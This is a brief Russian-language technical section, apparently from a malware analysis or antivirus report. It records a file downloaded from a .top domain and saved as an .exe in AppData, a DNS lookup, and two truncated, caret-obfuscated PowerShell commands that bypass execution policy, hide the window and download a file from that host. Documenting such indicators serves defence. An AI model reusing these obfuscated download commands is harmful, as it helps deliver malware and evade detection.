Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOW^E^R^s^heLl^.^eX^e -exeC^u^tIo^N^P^OLiCy^ bYp^Ass -^n^oPR^OFILe -wiNDoWstYL^e Hi^D^den (NE^W-objE^CT SyS^TEM.^N^et^.We^bCl^iENT).dOw^NlOADf^IlE(^'http://www.doorasope.to...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "pOW^E^R^s^heLl^.^eX^e -exeC^u^tIo^N^P^OLiCy^ bYp^Ass -^n^oPR^OFILe -wiNDoWstYL^e Hi^D^den (NE^W-objE^CT SyS^TEM.^N^et^.We^bCl^iENT).dOw^NlOADf^IlE(^'http://www.doorasope.to...' (со скрытым окном)